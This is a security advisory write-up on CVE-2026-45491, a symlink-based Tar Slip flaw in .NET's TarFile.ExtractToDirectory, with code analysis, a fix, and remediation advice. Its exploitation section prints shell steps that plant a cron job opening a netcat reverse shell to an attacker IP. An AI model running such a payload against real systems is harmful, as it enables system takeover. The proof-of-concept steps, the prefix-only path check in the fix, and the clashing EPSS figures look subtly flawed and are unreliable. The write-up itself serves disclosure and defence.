CVE-2026-45491
CVE-2026-45491: Directory Traversal via Improper Link Resolution in .NET System.Formats.Tar
Amit Schendel
Senior Security ResearcherJun 16, 2026·6 min read·7 visits
Executive Summary (TL;DR)
System.Formats.Tar in .NET 8.0, 9.0, and 10.0 fails to validate symbolic link targets during extraction, enabling local directory traversal and arbitrary file writes (Tar Slip).
A directory traversal vulnerability exists in the Microsoft .NET System.Formats.Tar library during archive extraction. When extracting a TAR archive using the TarFile.ExtractToDirectory API, the extraction engine improperly resolves symbolic links prior to file creation, allowing local unauthorized attackers to write or overwrite arbitrary files outside the target directory. This can lead to local tampering, privilege escalation, or arbitrary code execution.
Vulnerability Overview
The System.Formats.Tar namespace in .NET provides APIs to read, write, and manipulate TAR archives. Among these APIs, the TarFile.ExtractToDirectory method is commonly utilized to automate archive extraction in diverse environments, including cloud services, web applications, and automated file-ingestion pipelines.
This implementation is vulnerable to a "Tar Slip" directory traversal flaw classified under CWE-59 (Improper Link Resolution Before File Access). The vulnerability exposes applications to file system tampering if they extract untrusted archives. An attacker can craft an archive containing symbolic links that, when resolved, point to locations outside the designated extraction directory.
Because the extraction utility processes the link entries sequentially, subsequent files in the archive can be written through these malicious links. This bypasses the logical isolation of the extraction sandbox, allowing arbitrary modifications of files owned by the extraction process on the local file system.
Root Cause Analysis
The root cause of CVE-2026-45491 resides within the path resolution and extraction logic of System.Formats.Tar.TarFile.ExtractToDirectory. During the processing of a TAR archive, the engine evaluates file entries sequentially. When encountering a symbolic link entry (TarEntryType.SymbolicLink), the engine creates a relative link within the extraction directory pointing to the target specified in the header.
In vulnerable versions of the runtime, the library does not perform validation or canonicalization on the symbolic link's target path. An entry can declare its target path as a relative path utilizing directory traversal sequences (e.g., ../../../../../etc/cron.d). The library creates the symbolic link pointing to this arbitrary path without verifying if the resolved destination falls outside the extraction directory boundary.
When processing a subsequent archive entry that references the created link as a parent directory, the extraction engine attempts to write the file payload using standard file system APIs. The operating system's filesystem driver automatically resolves the symbolic link path, writing the payload to the external destination. This mechanism achieves arbitrary file creation or overwriting without triggering standard directory traversal checks that only inspect the literal name of the archive entry.
Code Analysis
Prior to the patch, the System.Formats.Tar extraction loop created symbolic links directly using the provided link name from the TAR header. Below is a conceptual representation of the vulnerable code pattern:
// Conceptual representation of vulnerable extraction logic
void ExtractEntry(TarEntry entry, string destinationDirectory)
{
string targetPath = Path.Combine(destinationDirectory, entry.Name);
if (entry.EntryType == TarEntryType.SymbolicLink)
{
// Vulnerable: Target path of symlink is not canonicalized or restricted
File.CreateSymbolicLink(targetPath, entry.LinkName);
}
else if (entry.EntryType == TarEntryType.RegularFile)
{
// Writes through existing symlinks if entry.Name starts with the symlink's name
entry.Extract(targetPath, overwrite: true);
}
}The fix introduces robust validation to ensure the target of any symbolic link is fully resolved and validated against the root extraction directory. The following code demonstrates the remediation logic introduced in the patched versions:
// Conceptual representation of patched extraction logic
void ExtractEntrySafe(TarEntry entry, string destinationDirectory)
{
string canonicalDestDir = Path.GetFullPath(destinationDirectory);
string targetPath = Path.GetFullPath(Path.Combine(canonicalDestDir, entry.Name));
// Verify the entry path is within the extraction directory
if (!targetPath.StartsWith(canonicalDestDir, StringComparison.OrdinalIgnoreCase))
{
throw new SecurityException("Directory traversal detected in entry name.");
}
if (entry.EntryType == TarEntryType.SymbolicLink)
{
string linkTarget = entry.LinkName;
// Resolve and canonicalize the symlink target path
string resolvedTarget = Path.GetFullPath(Path.Combine(Path.GetDirectoryName(targetPath)!, linkTarget));
// Fix: Validate that the resolved symlink target is within the destination directory
if (!resolvedTarget.StartsWith(canonicalDestDir, StringComparison.OrdinalIgnoreCase))
{
throw new SecurityException("Symbolic link target points outside the destination directory.");
}
File.CreateSymbolicLink(targetPath, linkTarget);
}
}This fix prevents the creation of escaping symlinks, neutralizing the extraction-phase traversal exploit vector entirely. It enforces strict boundary checks at both the entry name level and the symbolic link resolution level.
Exploitation & Attack Methodology
Exploitation of CVE-2026-45491 requires the attacker to construct a dual-stage TAR archive. The first stage contains a symbolic link entry whose name exists inside the destination folder, but whose target value points to a sensitive system directory. The second stage contains a file whose path uses the symbolic link folder name as a prefix, containing the payload to be written.
An attacker can use standard UNIX command-line tools to craft such an archive. For example, a target application extracts to /app/extracted/. The attacker runs:
# Step 1: Create a symlink pointing to /etc/cron.d locally
ln -s /etc/cron.d malicious_link
# Step 2: Create a payload file containing a malicious cron job
mkdir malicious_link
echo "* * * * * root /usr/bin/nc -e /bin/sh 10.0.0.5 4444" > malicious_link/payload
# Step 3: Package into TAR, preserving the symbolic link structure
tar -cvf exploit.tar malicious_link malicious_link/payloadWhen this archive is uploaded to a vulnerable .NET application running with sufficient privileges (e.g., root), the ExtractToDirectory call creates the symlink pointing to /etc/cron.d. When the application extracts the next entry (malicious_link/payload), the file is written to /etc/cron.d/payload. This results in the execution of the reverse shell under the context of the cron service.
Impact Assessment
The impact of successful exploitation is high-integrity local file modification. Depending on the privilege level of the host process running the .NET application, an attacker can modify system configuration files, install rogue binaries, or write files to autostart directories (such as cron paths, startup scripts, or systemd services).
If the application runs as root or administrator, this vulnerability leads to complete system compromise and local privilege escalation. In containerized environments, an attacker can escape the application container or write keys to shared volumes, compromising adjacent workloads.
Although the attack vector is local, it poses a severe threat to multi-tenant SaaS architectures, file processing platforms, and continuous integration pipelines that automatically process archives submitted by untrusted users. The vulnerability's CVSS v3.1 base score of 6.2 reflects its high impact on system integrity combined with a local vector.
Remediation & Detection Guidance
Complete remediation requires upgrading to the patched versions of .NET released during the June 2026 servicing window. Administrators should ensure the host runtimes are updated immediately to version 8.0.28, 9.0.17, or 10.0.9.
For systems where upgrading the runtime is not immediately feasible, developers must implement a custom extraction workflow to perform manual validation. Instead of calling TarFile.ExtractToDirectory, developers must manually iterate over TarReader entries, fully resolve each path using Path.GetFullPath, and verify that both entry paths and symlink targets start with the canonicalized target directory path.
Detection can be achieved via static analysis to locate references to TarFile.ExtractToDirectory and runtime auditing. File Integrity Monitoring (FIM) should be configured on high-value system paths like /etc/ and C:\Windows\System32\ to detect anomalous write operations originating from user-facing application pools.
Fix Analysis (4)
Technical Appendix
CVSS Score
6.2/ 10
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:NEPSS Probability
0.30%
Top 78% most exploited
Affected Systems
.NET Core and .NET runtimes on Linux (Ubuntu, RHEL, Rocky, Alma, Amazon Linux, Alpine, Oracle Linux).NET Core and .NET runtimes on WindowsASP.NET Core applications incorporating archive upload or processing components
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
.NET 8.0 Microsoft | >= 8.0.0 to < 8.0.28 | 8.0.28 |
.NET 9.0 Microsoft | >= 9.0.0 to < 9.0.17 | 9.0.17 |
.NET 10.0 Microsoft | >= 10.0.0 to < 10.0.9 | 10.0.9 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-59 |
| Attack Vector | Local |
| CVSS Base Score | 6.2 |
| EPSS Score | 0.00301 (21.55 percentile) |
| Impact | High Integrity Tampering / Privilege Escalation |
| Exploit Status | No public weaponized exploit code available |
| CISA KEV Status | Not Listed |
MITRE ATT&CK Mapping
CWE-59
Improper Link Resolution Before File Access ('Link Following')
The application attempts to access or write a file using a path that contains a symbolic or hard link. If the destination of that link is not validated, the application resolves the link to a target location outside the intended sandbox.
Vulnerability Timeline
Internal code fixes for quality and servicing branches merged in .NET Runtime
2026-04-24
Microsoft publishes advisory and releases official security updates
2026-06-09
CVE Record metadata updated on CVE.org
2026-06-15
